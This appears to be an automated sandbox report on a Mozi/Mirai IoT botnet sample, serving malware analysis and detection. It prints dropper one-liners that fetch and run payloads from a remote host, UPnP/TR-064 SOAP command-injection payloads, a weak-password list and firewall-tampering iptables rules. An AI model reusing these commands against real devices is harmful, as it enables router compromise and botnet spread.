    • gzip (PID: 3976, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
    • gzip (PID: 3979, Parent: 3938, MD5: 25ea567880cec4ac02e7a77ad304e3c6) Arguments: /bin/gzip
  • dash New Fork (PID: 4018, Parent: 2079)
  • rm (PID: 4018, Parent: 2079, MD5: b79876063d894c449856cca508ecca7f) Arguments: rm -f /tmp/tmp.vHWsTctARt
  • upstart New Fork (PID: 4504, Parent: 2015)
  • sh (PID: 4504, Parent: 2015, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4513, Parent: 4504)
    • date (PID: 4513, Parent: 4504, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4515, Parent: 4504)
    • apport-checkreports (PID: 4515, Parent: 4504, MD5: 1a7d84ebc34df04e55ca3723541f48c9) Arguments: /usr/bin/python3 /usr/share/apport/apport-checkreports --system
  • upstart New Fork (PID: 4531, Parent: 2015)
  • sh (PID: 4531, Parent: 2015, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4535, Parent: 4531)
    • date (PID: 4535, Parent: 4531, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4541, Parent: 4531)
    • apport-gtk (PID: 4541, Parent: 4531, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • upstart New Fork (PID: 4558, Parent: 2015)
  • sh (PID: 4558, Parent: 2015, MD5: e02ea3c3450d44126c46d658fa9e654c) Arguments: /bin/sh -e /proc/self/fd/9
    • sh New Fork (PID: 4561, Parent: 4558)
    • date (PID: 4561, Parent: 4558, MD5: 54903b613f9019bfca9f5d28a4fff34e) Arguments: date
    • sh New Fork (PID: 4568, Parent: 4558)
    • apport-gtk (PID: 4568, Parent: 4558, MD5: ec58a49a30ef6a29406a204f28cc7d87) Arguments: /usr/bin/python3 /usr/share/apport/apport-gtk
  • cleanup

Yara Overview

Initial Sample

Source | Rule | Description | Author | Strings
Mozi.m | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth | (matches listed below)
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
Mozi.m | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
Mozi.m | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security |
Mozi.m | JoeSecurity_Mirai_4 | Yara detected Mirai | Joe Security |

Dropped Files

Source | Rule | Description | Author | Strings
/usr/networks | SUSP_XORed_Mozilla | Detects suspicious XORed keyword - Mozilla/5.0 | Florian Roth | (matches listed below)
  • 0x37450:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x374c0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37530:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x375a0:$xo1: oMXKNNC\x0D\x17\x0C\x12
  • 0x37610:$xo1: oMXKNNC\x0D\x17\x0C\x12
/usr/networks | JoeSecurity_Mirai_8 | Yara detected Mirai | Joe Security |
/usr/networks | JoeSecurity_Mirai_9 | Yara detected Mirai | Joe Security |
/usr/networks | JoeSecurity_Mirai_4 | Yara detected Mirai | Joe Security |

Signature Overview

AV Detection:

Antivirus / Scanner detection for submitted sample
Source: Mozi.m | Avira: detected
Antivirus detection for dropped file
Source: /usr/networks | Avira: detection malicious, Label: LINUX/Mirai.lldau
Multi AV Scanner detection for submitted file
Source: Mozi.m | Virustotal: Detection: 70%
Source: Mozi.m | ReversingLabs: Detection: 62%

Spreading:

Found strings indicative of a multi-platform dropper
Source: Mozi.m | String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Mozi.m | String: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Mozi.m | String: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Opens /proc/net/* files useful for finding connected devices and routers
Source: /tmp/Mozi.m (PID: 3515) | Opens: /proc/net/route
Source: /tmp/Mozi.m (PID: 3515) | Opens: /proc/net/route

              Networking:

Executes the "iptables" command to insert, remove and/or manipulate rules
Source: /bin/sh (PID: 3690) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 4353) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4364) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4390) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4408) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4429) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4440) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 4467) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4478) | Iptables executable using switch for changing the iptables rules: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 3690) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3725) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3739) | Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --destination-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3772) | Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --source-port 51746 -j ACCEPT
Source: /bin/sh (PID: 3783) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3808) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 3813) | Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p tcp --dport 51746 -j ACCEPT
Source: /bin/sh (PID: 3822) | Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p tcp --sport 51746 -j ACCEPT
Source: /bin/sh (PID: 4029) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: /bin/sh (PID: 4032) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: /bin/sh (PID: 4036) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: /bin/sh (PID: 4055) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: /bin/sh (PID: 4107) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: /bin/sh (PID: 4137) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: /bin/sh (PID: 4162) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: /bin/sh (PID: 4180) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: /bin/sh (PID: 4199) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: /bin/sh (PID: 4216) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: /bin/sh (PID: 4239) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: /bin/sh (PID: 4251) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: /bin/sh (PID: 4275) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: /bin/sh (PID: 4285) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: /bin/sh (PID: 4314) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: /bin/sh (PID: 4328) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: /bin/sh (PID: 4353) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4364) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4390) | Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --destination-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4408) | Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --source-port 28296 -j ACCEPT
Source: /bin/sh (PID: 4429) | Iptables executable: /sbin/iptables -> iptables -I INPUT -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4440) | Iptables executable: /sbin/iptables -> iptables -I OUTPUT -p udp --sport 28296 -j ACCEPT
Source: /bin/sh (PID: 4467) | Iptables executable: /sbin/iptables -> iptables -I PREROUTING -t nat -p udp --dport 28296 -j ACCEPT
Source: /bin/sh (PID: 4478) | Iptables executable: /sbin/iptables -> iptables -I POSTROUTING -t nat -p udp --sport 28296 -j ACCEPT
Source: /tmp/Mozi.m (PID: 3515) | Socket: 0.0.0.0::51746
Source: Mozi.m | String found in binary or memory: http://%s:%d/Mozi.a;chmod
Source: Mozi.m | String found in binary or memory: http://%s:%d/Mozi.a;sh$
Source: Mozi.m | String found in binary or memory: http://%s:%d/Mozi.m
Source: Mozi.m | String found in binary or memory: http://%s:%d/Mozi.m;
Source: Mozi.m | String found in binary or memory: http://%s:%d/Mozi.m;$
Source: Mozi.m | String found in binary or memory: http://%s:%d/Mozi.m;/tmp/Mozi.m
Source: Mozi.m | String found in binary or memory: http://%s:%d/bin.sh
Source: Mozi.m | String found in binary or memory: http://%s:%d/bin.sh;chmod
Source: Mozi.m | String found in binary or memory: http://127.0.0.1
Source: Mozi.m | String found in binary or memory: http://127.0.0.1sendcmd
Source: Mozi.m | String found in binary or memory: http://HTTP/1.1
Source: Mozi.m | String found in binary or memory: http://baidu.com/%s/%s/%d/%s/%s/%s/%s)
Source: .config.66.dr | String found in binary or memory: http://ia.51.la/go1?id=17675125&pu=http%3a%2f%2fv.baidu.com/
Source: Mozi.m | String found in binary or memory: http://ipinfo.io/ip
Source: alsa-info.sh0.66.dr | String found in binary or memory: http://pastebin.ca)
Source: alsa-info.sh0.66.dr | String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY
Source: alsa-info.sh0.66.dr | String found in binary or memory: http://pastebin.ca/quiet-paste.php?api=$PASTEBINKEY&encrypt=t&encryptpw=blahblah
Source: Mozi.m | String found in binary or memory: http://purenetworks.com/HNAP1/
Source: Mozi.m | String found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
Source: Mozi.m | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope/
Source: Mozi.m | String found in binary or memory: http://schemas.xmlsoap.org/soap/envelope//
Source: alsa-info.sh0.66.dr | String found in binary or memory: http://www.alsa-project.org
Source: alsa-info.sh0.66.dr | String found in binary or memory: http://www.alsa-project.org.
Source: alsa-info.sh0.66.dr | String found in binary or memory: http://www.alsa-project.org/alsa-info.sh
Source: alsa-info.sh0.66.dr | String found in binary or memory: http://www.alsa-project.org/cardinfo-db/
Source: alsa-info.sh0.66.dr | String found in binary or memory: http://www.pastebin.ca
Source: alsa-info.sh0.66.dr | String found in binary or memory: http://www.pastebin.ca.
Source: alsa-info.sh0.66.dr | String found in binary or memory: http://www.pastebin.ca/upload.php
Source: /tmp/Mozi.m (PID: 3492) | HTML file containing JavaScript created: /usr/networks
Source: Initial sample | String containing 'busybox' found: busybox
Source: Initial sample | String containing 'busybox' found: ..%s/%s/proc/haha/tmp/var/lib/dev/syscfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer URL "http://127.0.0.1"cfgtool set /mnt/jffs2/hw_ctree.xml InternetGatewayDevice.ManagementServer ConnectionRequestPassword "acsMozi"iptables -I INPUT -p tcp --destination-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 50023 -j DROPiptables -I OUTPUT -p tcp --source-port 35000 -j DROPiptables -I INPUT -p tcp --destination-port 7547 -j DROPiptables -I OUTPUT -p tcp --source-port 7547 -j DROPiptables -I INPUT -p tcp --dport 35000 -j DROPiptables -I INPUT -p tcp --dport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 50023 -j DROPiptables -I OUTPUT -p tcp --sport 35000 -j DROPiptables -I INPUT -p tcp --dport 7547 -j DROPiptables -I OUTPUT -p tcp --sport 7547 -j DROP/mnt/jffs2/Equip.sh%s%s%s%s#!/bin/sh/mnt/jffs2/wifi.sh/mnt/jffs2/WifiPerformance.shbusybox%255s %255s %255s %255s
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|head -n 1
Source: Initial sample | String containing 'busybox' found: /bin/busybox hexdump -e '16/1 "%c"' -n 52 /bin/ls
Source: Initial sample | String containing 'busybox' found: /bin/busybox cat /bin/ls|more
Source: Initial sample | String containing 'busybox' found: "\x%02xsage:/bin/busybox cat /bin/ls|head -n 1
Source: Initial sample | String containing 'busybox' found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample | String containing 'busybox' found: /bin/busybox dd bs=52 count=1 if=/bin/ls || /bin/busybox cat /bin/ls || while read i; do printf $i; done < /bin/ls || while read i; do printf $i; done < /bin/busybox
Source: Initial sample | String containing 'busybox' found: /bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample | String containing 'busybox' found: /bin/busybox echo '%s' %s .i; %s && /bin/busybox echo '%s'
Source: Initial sample | String containing 'busybox' found: ./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/bin.sh ||curl -O http://%s:%d/bin.sh ||/bin/busybox wget http://%s:%d/bin.sh;chmod 777 bin.sh ||(cp /bin/ls bix.sh;cat bin.sh>bix.sh;rm bin.sh;cp bix.sh bin.sh;rm bix.sh);sh bin.sh %s;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: >/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: /bin/busybox wget;/bin/busybox echo -ne '%s'
Source: Initial sample | String containing 'busybox' found: ELF.r.c.x.k.p.s.6.m.l.4>>/bin/busybox chmod 777 .i || (cp /bin/ls .j && cat .i>.j &&rm .i && cp .j .i &&rm .j)>.x/bin/busybox echo -ne '%s' %s .i; %s && /bin/busybox echo -en '%s'
Source: Initial sample | String containing 'busybox' found: me./.i %d %d %d %d %d;./Runn;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: nvalidailedncorrecteniedoodbyebad$ELFshelldvrdvswelcomesuccessmdm96259615-cdpF6connectedBCM#usernamepass>/var/run/.x&&cd /var/run;>/mnt/.x&&cd /mnt;>/usr/.x&&cd /usr;>/dev/.x&&cd /dev;>/dev/shm/.x&&cd /dev/shm;>/tmp/.x&&cd /tmp;>/var/.x&&cd /var;rm -rf i;wget http://%s:%d/i ||curl -O http://%s:%d/i ||/bin/busybox wget http://%s:%d/i;chmod 777 i ||(cp /bin/ls ii;cat i>ii &&rm i;cp ii i;rm ii);./i;/bin/busybox echo -e '%s'
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0" ?><s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/" s:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><s:Body><u:Upgrade xmlns:u="urn:schemas-upnp-org:service:WANPPPConnection:1"><NewStatusURL>$(/bin/busybox wget -g %s:%d -l /tmp/huawei -r /Mozi.m;chmod -x huawei;/tmp/huawei huawei)</NewStatusURL><NewDownloadURL>$(echo HUAWEIUPNP)</NewDownloadURL></u:Upgrade></s:Body></s:Envelope>
Source: Initial sample | String containing 'busybox' found: <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"><SOAP-ENV:Body><u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"><NewNTPServer1>`cd /tmp && rm -rf * && /bin/busybox wget http://%s:%d/Mozi.m && chmod 777 /tmp/tr064 && /tmp/tr064 tr064`</NewNTPServer1><NewNTPServer2>`echo DEATH`</NewNTPServer2><NewNTPServer3>`echo DEATH`</NewNTPServer3><NewNTPServer4>`echo DEATH`</NewNTPServer4><NewNTPServer5>`echo DEATH`</NewNTPServer5></u:SetNTPServers></SOAP-ENV:Body></SOAP-ENV:Envelope>
Source: Initial sample | String containing potential weak password found: admin
Source: Initial sample | String containing potential weak password found: default
Source: Initial sample | String containing potential weak password found: support
Source: Initial sample | String containing potential weak password found: service
Source: Initial sample | String containing potential weak password found: supervisor
Source: Initial sample | String containing potential weak password found: guest
Source: Initial sample | String containing potential weak password found: administrator
Source: Initial sample | String containing potential weak password found: 123456
Source: Initial sample | String containing potential weak password found: 54321
Source: Initial sample | String containing potential weak password found: password
Source: Initial sample | String containing potential weak password found: 12345
Source: Initial sample | String containing potential weak password found: admin1234
Source: Initial sample | Potential command found: POST /cdn-cgi/
Source: Initial sample | Potential command found: GET /c HTTP/1.0
Source: Initial sample | Potential command found: POST /cdn-cgi/ HTTP/1.1
Source: Initial sample | Potential command found: GET %s HTTP/1.1
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 35000 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 50023 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 50023 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 35000 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 7547 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 7547 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 35000 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 50023 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 50023 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 35000 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 7547 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 7547 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 58000 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 58000 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 58000 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 58000 -j DROP
Source: Initial sample | Potential command found: rm /home/httpd/web_shell_cmd.gch
Source: Initial sample | Potential command found: echo 3 > /usr/local/ct/ctadmincfg
Source: Initial sample | Potential command found: mount -o remount,rw /overlay /
Source: Initial sample | Potential command found: mv -f %s %s
Source: Initial sample | Potential command found: iptables -I INPUT -p udp --destination-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I OUTPUT -p udp --source-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p udp --destination-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p udp --source-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I INPUT -p udp --dport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I OUTPUT -p udp --sport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p udp --dport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p udp --sport %d -j ACCEPT
Source: Initial sample | Potential command found: GET /c
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p tcp --destination-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p tcp --source-port %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I PREROUTING -t nat -p tcp --dport %d -j ACCEPT
Source: Initial sample | Potential command found: iptables -I POSTROUTING -t nat -p tcp --sport %d -j ACCEPT
Source: Initial sample | Potential command found: killall -9 %s
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 22 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 23 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --destination-port 2323 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 22 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 23 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --source-port 2323 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 22 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 23 -j DROP
Source: Initial sample | Potential command found: iptables -I INPUT -p tcp --dport 2323 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 22 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 23 -j DROP
Source: Initial sample | Potential command found: iptables -I OUTPUT -p tcp --sport 2323 -j DROP
Source: Initial sample | Potential command found: killall -9 telnetd utelnetd scfgmgr
Source: Initial sample | Potential command found: dd bs=52 count=1 if=/bin/ls || cat /bin/ls || while read i; do echo $i; done < /bin/ls || while read i; do echo $i; done < /bin/busybox
Source: Initial sample | Potential command found: GET /Mozi.6 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.7 HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.c HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.m HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.x HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.a HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.s HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.r HTTP/1.0
Source: Initial sample | Potential command found: GET /Mozi.b HTTP/1.0
